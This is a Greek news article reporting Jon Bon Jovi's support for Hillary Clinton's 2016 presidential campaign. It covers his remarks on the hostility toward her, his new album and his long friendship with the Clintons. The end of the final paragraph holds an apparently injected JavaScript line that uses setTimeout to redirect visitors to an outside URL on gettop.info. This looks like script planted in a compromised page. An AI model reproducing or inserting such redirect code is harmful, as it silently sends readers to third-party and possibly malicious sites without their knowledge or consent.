Στο πλευρό της Χίλαρι και ο Τζον Μπον Τζόβι

0
13

 

«Είναι τρομερή η έκφραση μίσους απέναντι στο πρόσωπο της Χίλαρι Κλίντον. Πάρτε ως παράδειγμα όταν είχε αρρωστήσει με πνευμονία και φοβούνταν να δημοσιοποιήσουν τα στοιχεία. Οι άνθρωποι αρρωσταίνουν, έτσι είναι το φυσιολογικό και θα πρέπει να το παραδέχονται στον κόσμο», δήλωσε ο Τζον Μπον Τζόβι παίρνοντας κι αυτός μέρος στην προεκλογική εκστρατεία των ΗΠΑ, τασσόμενος καθαρά στο πλευρό της Χίλαρι Κλίντον.

Παρότι η Κλίντον, όπως και ο αντίπαλός της Ντόναλντ Τραμπ είναι αντιπαθής σε πολλούς Αμερικανούς, πιστεύει ότι θα ήταν πιο δίκαιο τις εκλογές να κερδίσουν οι Δημοκρατικοί. «Ελπίζω ότι θα κερδίσει η Κλίντον, γιατί είναι καλύτερη. Ήταν η Πρώτη Κύρια των ΗΠΑ, γερουσιαστής και υπουργός», είπε ο 54χρονος σταρ που εκφράζει την ανησυχία του για την πόλωση της προεκλογικής εκστρατείας.

Ο Τζον Μπον Τζόβι μόλις κυκλοφόρησε το νέο του άλμπουμ με τίτλο «This House is not for sale», ενώ διατηρεί φιλικές σχέσεις με το ζεύγος Κλίντον για περισσότερα από 20 χρόνια και έχει υποστηρίξει πολλές φορές την υποψηφιότητα της Χίλαρι. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here